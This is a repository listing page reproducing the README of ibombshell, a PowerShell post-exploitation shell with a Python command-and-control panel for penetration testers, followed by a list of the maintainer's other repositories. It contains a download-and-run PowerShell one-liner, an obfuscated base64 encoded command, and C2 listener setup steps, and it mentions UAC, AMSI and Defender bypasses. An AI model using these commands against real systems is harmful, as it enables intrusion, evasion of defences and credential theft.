Telefonica/ibombshell Telefonica/ibombshell

  • Stars
    star
    308
  • Rank 135,712 (Top 3 %)
  • Language
    Python
  • License
    GNU General Publi...
  • Created over 6 years ago
  • Updated over 3 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
Telefonica/ibombshell
github

Telefonica

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Tool to deploy a post-exploitation prompt at any time

Supported Python versions License

ibombshell - Dynamic Remote Shell

      ,--.!,    _ ____                  __   _____ __         ____
   __/   -*-   (_) __ )____  ____ ___  / /_ / ___// /_  ___  / / /
 ,d08b.  '|`  / / __  / __ \/ __ `__ \/ __ \\__ \/ __ \/ _ \/ / /
 0088MM      / / /_/ / /_/ / / / / / / /_/ /__/ / / / /  __/ / /
 `9MMP'     /_/_____/\____/_/ /_/ /_/_.___/____/_/ /_/\___/_/_/

 [+] Starting the console...
 [*] Console ready!

ibombshell is a tool written in Powershell that allows you to have a prompt at any time with post-exploitation functionalities (and in some cases exploitation). It is a shell that is downloaded directly to memory providing access to a large number of pentesting features. These functionalities can be downloaded directly to memory, in the form of a Powershell function. This form of execution is known as everywhere.

In addition, ibombshell provides a second execution mode called Silently, so the pentester can execute an instance of ibombshell (called warrior). The compromised computer will be connected to a C2 panel through HTTP. Therefore, it will be possible to control the warrior and be able to load functions in memory that help the pentester. This is happening whithin the post-exploitation phase.

Prerequisities

To run ibombshell everywhere it is mandatory to have PowerShell 3.0 or higher. For operating systems other than Windows you can read more about this in the PowerShell GitHub - PowerShell for every system!.

To run the ibombshell silently mode you need python 3.6 and some python libraries. You can install this with:

cd ibombshell\ c2/
pip install -r requirements.txt

Note: ibombshell C2 works in python 3.X. Make sure you run a pip relative to this version.

Usage

ibombshell has two execution modes:

ibombshell everywhere

To load ibombshell simply run on PowerShell:

iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/Telefonica/ibombshell/master/console’)

Now you can run the downloaded ibombshell console running:

console

ibombshell everywhere in isolated environments

If you need to use ibombshell in isolated environments, you must prepare your computer first in a networked environment. Load all the functions you will need, and use savefunctions to save them in the Windows registry.

Now you can use this base 64 code to get ibombshell:

powershell.exe -E "JABwAGEAdABoACAAPQAgACcAaABrAGMAdQA6AFwAcwBvAGYAdAB3AGEAcgBlAFwAYwBsAGEAcwBzAGUAcwBcAGkAYgBvAG0AYgBzAGgAZQBsAGwAXABjAG8AbgBzAG8AbABlACcAOwAgAHQAcgB5ACAAewAJAGkAZgAoAHQAZQ
BzAHQALQBwAGEAdABoACAAJABwAGEAdABoACkAIAB7ACAAJABjAG8AbgBzAG8AbABlACAAPQAgACgARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACQAcABhAHQAaAApAC4ATgBhAG0AZQA7ACAAYwBkACAAaABrAGMAdQA6
ADsAIAAkAG4AYQBtAGUAIAA9ACAAJABjAG8AbgBzAG8AbABlAC4AcwBwAGwAaQB0ACgAIgBcACIAKQBbAC0AMQBdADsAIAAkAGMAbwBkAGUAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIAJABjAG
8AbgBzAG8AbABlACIAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAUAByAG8AcABlAHIAdAB5ACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUA
YwB0ACAAewBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAcABzAG8AYgBqAGUAYwB0ACAALQBQAHIAbwBwAGUAcgB0AHkAIABAAHsAIgBwAHIAbwBwAGUAcgB0AHkAIgA9ACQAXwA7ACAAIgBWAGEAbAB1AGUAIgAgAD0AIAAoAEcAZQ
B0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiACQAYwBvAG4AcwBvAGwAZQAiACAALQBOAGEAbQBlACAAJABfACkALgAkAF8AfQB9ACkALgBWAGEAbAB1AGUAOwAgACQAYwBvAGQAZQAgAHwAIABv
AHUAdAAtAHMAdAByAGkAbgBnACAAfAAgAGkAZQB4ADsAIABjADoAOwAgAGMAbwBuAHMAbwBsAGUAOwB9AH0AYwBhAHQAYwBoAHsAdwByAGkAdABlAC0AaABvAHMAdAAgACQARQByAHIAbwByAFsAMABdAH0A"

ibombshell silently mode

This version allows you to run the ibombshell console and remotely control it from the C2 panel created in python. To run this version, first you must launch the console process in powershell:

iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/Telefonica/ibombshell/master/console’)

On ibombshell C2 path, prepare the C2:

python3 ibombshell.py

And create the listener where the warriors will connected:

iBombShell> load modules/listener.py
[+] Loading module...
[+] Module loaded!
iBombShell[modules/listener.py]> run

The default listener port is 8080. Finally you can launch the console in silently mode on the host to get remote control:

console -Silently -uriConsole http://[ip or domain]:[port]

ibombshell C2 scheme

The basic operation of the ibombshell control panel follows the following scheme:

        ibombshell                 C2
            |                      |
            |    newibombshell     |
            +--------------------->| --+ register
            |                      |<--+ from IP
            |    get functions     |
            |   and instructions   |
            +--------------------->|
            |                      |
            |    send functions    |
            |   and instructions   |
execute +-- |<---------------------+
        +-->|                      |
            |       results        |
            +--------------------->|
            |                      |

Docker

We have created a docker container with everything you need to make it works. Run this command from Dockerfile location.

sudo docker build -t "ibombshell" .
sudo docker run -it ibombshell

Example videos

Some example videos...

iBombShell: PoC Warrior + Bypass UAC + Pass the hash

iBombShell: PoC Warrior + Bypass UAC + Pass the hash

iBombShell: macOS

iBombShell: PoC de uso desde macOS

ibombshell: Extracting Private SSH Keys on Windows 10

ibombshell: Módulo para extracción de claves privadas SSH en Windows 10

iBombShell: PoC savefunctions

iBombShell: PoC savefunctions

ibombshell - Silently bypass UAC Environment Injection

ibombshell - Modo silencioso para el bypass UAC Environment Injection

iBombShell - Mocking Trusted Directory

iBombShell - Mocking Trusted Directory

iBombShell - DLL generation

iBombShell - DLL Generation

iBombShell - AMSI & Windows Defender Bypass

iBombShell - AMSI & Windows Defender Bypass

License

This project is licensed under the GNU General Public License - see the LICENSE file for details

Contact

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. WHENEVER YOU MAKE A CONTRIBUTION TO A REPOSITORY CONTAINING NOTICE OF A LICENSE, YOU LICENSE YOUR CONTRIBUTION UNDER THE SAME TERMS, AND YOU AGREE THAT YOU HAVE THE RIGHT TO LICENSE YOUR CONTRIBUTION UNDER THOSE TERMS. IF YOU HAVE A SEPARATE AGREEMENT TO LICENSE YOUR CONTRIBUTIONS UNDER DIFFERENT TERMS, SUCH AS A CONTRIBUTOR LICENSE AGREEMENT, THAT AGREEMENT WILL SUPERSEDE.

This software doesn't have a QA Process. This software is a Proof of Concept.

If you have any problems, you can contact:

[email protected]

More Repositories

1

Eternalblue-Doublepulsar-Metasploit

Module of Metasploit to exploit the vulnerability Eternalblue-Doublepulsar.
Ruby
1,025
star
2

HomePWN

HomePwn - Swiss Army Knife for Pentesting of IoT Devices
Python
874
star
3

prometheus-kafka-adapter

Use Kafka as a remote storage database for Prometheus (remote write only)
Go
285
star
4

ATTPwn

ATTPwn
Python
207
star
5

toolium

Wrapper tool of Selenium and Appium libraries to test web and mobile applications in a single project
Python
113
star
6

uac-a-mola

Python
105
star
7

on-the-fly

on-the-fly
Python
82
star
8

Telefonica-WannaCry-FileRestorer

Tool to restore some WannaCry files which encryption weren't finish properly
PowerShell
59
star
9

Airdrop-Crazy

Airdrop Crazy
Python
57
star
10

mistica-web

React components library for Telefonica Design System (Mistica)
TypeScript
52
star
11

nginx-canary

nginx with canary release strategy
Lua
45
star
12

level_up

Python
40
star
13

HiddenNetworks-Python

Python
37
star
14

HashCheck

Ideaslocas Repository
Python
36
star
15

USBHiddenNetworks

PowerShell
31
star
16

SDK-SMS-Stack

SDK-SMS-Stack
Java
29
star
17

webview-bridge

Novum JavaScript Bridge
TypeScript
27
star
18

latch-plugin-wordpress

Latch module for WordPress that lets end-users add an extra level of security to their accounts
PHP
24
star
19

TEFstrap

Bootstrap Theme for Telefonica
CSS
23
star
20

mistica

20
star
21

mistica-design

Mística Design System (only design)
20
star
22

latch-plugin-unix

Shell
20
star
23

latch-sdk-python

Python
19
star
24

node-merge-config

Merge multiple configuration sources: JSON and YAML files, directories, environment properties and command-line arguments.
JavaScript
19
star
25

latch-sdk-php

PHP
17
star
26

node-express-logging

Express middleware to log, using a configurable logger, each request and response.
JavaScript
16
star
27

OMLASP

OMLASP (Ideas Locas)
Jupyter Notebook
15
star
28

node-server-terminate

Allow terminating a server in an orderly fashion
JavaScript
15
star
29

seed-golang

Seed for golang projects
Go
14
star
30

WPM-Wordpress-in-Paranoid-Mode

Ruby
13
star
31

mistica-ios

Swift
13
star
32

node-jwt-utils

JSON Web Tokens (JWT) utils.
JavaScript
13
star
33

latch-plugin-joomla

PHP
11
star
34

toolium-examples

Set of examples to learn how to use toolium different functionalities
Python
11
star
35

tweaks

A customizable debug screen to view and edit flags that can be used for development
Kotlin
11
star
36

HoneyBadger

Python
10
star
37

MetaThief

PoC for extracting office files into PDF file metadata
Python
10
star
38

node-express-domaining

Express middleware to automatically create and destroy a domain.
JavaScript
10
star
39

toolium-template

Base project to start using toolium for your testing automation projects
Python
10
star
40

alfalfa

Opinionated startup for node services and applications to remove plumbing and boilerplate
TypeScript
10
star
41

puppet-github-actions-runner

In This Repository you can find a module that will setup all of the files and configuration needed for GitHub Actions runner to work on Linux hosts (Ubuntu, Debian and CentOS).
Ruby
10
star
42

node-http-pooling-agent

HTTP agent with smart socket pool
JavaScript
9
star
43

node-express-tracking

Express middleware to track the request and response storing in the domain the operation, transactionId and correlator.
JavaScript
9
star
44

CrazyToolBox

A web3 utilities toolbox
Python
9
star
45

govice

Golang library to develop a production-like service
Go
8
star
46

mistica-android

Kotlin
7
star
47

mistica-icons

Mística Design System Icons library
7
star
48

luis-cli

Simple command-line interface to interact with Microsoft LUIS APIs.
TypeScript
7
star
49

node-express-metrics

Express middleware to automatically log the metrics traces.
JavaScript
7
star
50

Docker-WPM-Environment

Ruby
6
star
51

latch-sdk-java

Java
6
star
52

latch-sdk-nodejs

NodeJS SDK for latch
JavaScript
6
star
53

node-themible

Themible Module to set up the theme (to customize the web presentation) and locales (for internationalization) of a node.js express application.
JavaScript
6
star
54

language-model-converter

Language model converter yaml <-> json for LUIS
TypeScript
5
star
55

Cube11Paths

Machine Learning authentication system based on a custom Rubik cube.
C
5
star
56

latch-plugin-jira

Latch plugin for Jira
Java
4
star
57

android-nested-scroll-webview

Android WebView implementation for nested scrolling layouts
Java
4
star
58

seed-bot

Seed bot project
TypeScript
4
star
59

latch-sdk-c

C
4
star
60

clips

Snapshot of the CLIPS rules engine
C
4
star
61

latch-plugin-openLDAP

C
4
star
62

cerdito

Save a few cents on your cloud infrastructure
Rust
4
star
63

latch-sdk-dotnet

C#
3
star
64

LambdaNetwork

Python
3
star
65

x-ray_code

XRayCode
Python
3
star
66

gymnos

A training platform for AI models
Python
3
star
67

msteams-private-messages

Send private messages programmatically in MSTeams
JavaScript
3
star
68

k8s-spa

K8s Static Pod Autoscaler
Rust
3
star
69

helm-charts

Kubernetes applications
Python
3
star
70

java-plainmap

Java library to access elements in a hierarchical map as a simple map
Java
3
star
71

latch-plugin-drupal7

PHP
3
star
72

latch-plugin-dotnet-membership-provider

C#
3
star
73

post-buildkite-plugin

Post jobs recovery buildkite plugin (WIP)
JavaScript
2
star
74

latch-plugin-squirrelmail

PHP
2
star
75

latch-sdk-ruby

Ruby
2
star
76

latch-plugin-prestashop

PHP
2
star
77

jwt-bulk-generator

Script to generate JWT tokens and store them in a csv file
JavaScript
2
star
78

Metaverse-3d-Assets

2
star
79

latch-plugin-jenkins

Latch plugin for Jenkins CI tool
Java
2
star
80

latch-plugin-redmine

Ruby
2
star
81

latch-sdk-powershell

C#
2
star
82

android-mock-api-server

Kotlin
2
star
83

dome9-cli

Dome9 utilities: SDK, CLI & Agile module
Python
2
star
84

latch-plugin-roundcube

PHP
2
star
85

latch-plugin-open-xchange

Java
2
star
86

latch-plugin-phpBB

JavaScript
2
star
87

latch-plugin-drupal8

PHP
2
star
88

github-pr-comment-buildkite-plugin

buildkite plugin to post a comment in a PR
Shell
2
star
89

XAIoGraphs

XAIoGraphs (eXplainability Articicial Intelligence over Graphs) is an Explicability and Fairness Python library for classification problems with tabulated and discretized data.
Python
2
star
90

iot-utils

IOT operation Utilities & systems management tools - Ansible Scripting Python WinSSH OpenStack VirtualBox MySQL Postgress MongoDB DevOPS Admin
Shell
2
star
91

opengateway-developers-website

Telefónica's Open Gateway developers website
CSS
1
star
92

niji-dashboard-angular

Niji Dashboard 2.x (Angular)
TypeScript
1
star
93

latch-plugin-owncloud

PHP
1
star
94

la-acme-inc

TypeScript
1
star
95

react-code-test

TypeScript
1
star
96

latch-plugin-sugarCRM

PHP
1
star
97

latch-plugin-drupal6

PHP
1
star
98

living-app-v2-react-template

Set up a modern Living App by forking.
JavaScript
1
star
99

latch-plugin-dotnetnuke

C#
1
star
100

latch-plugin-WindowsAuthProvider

C
1
star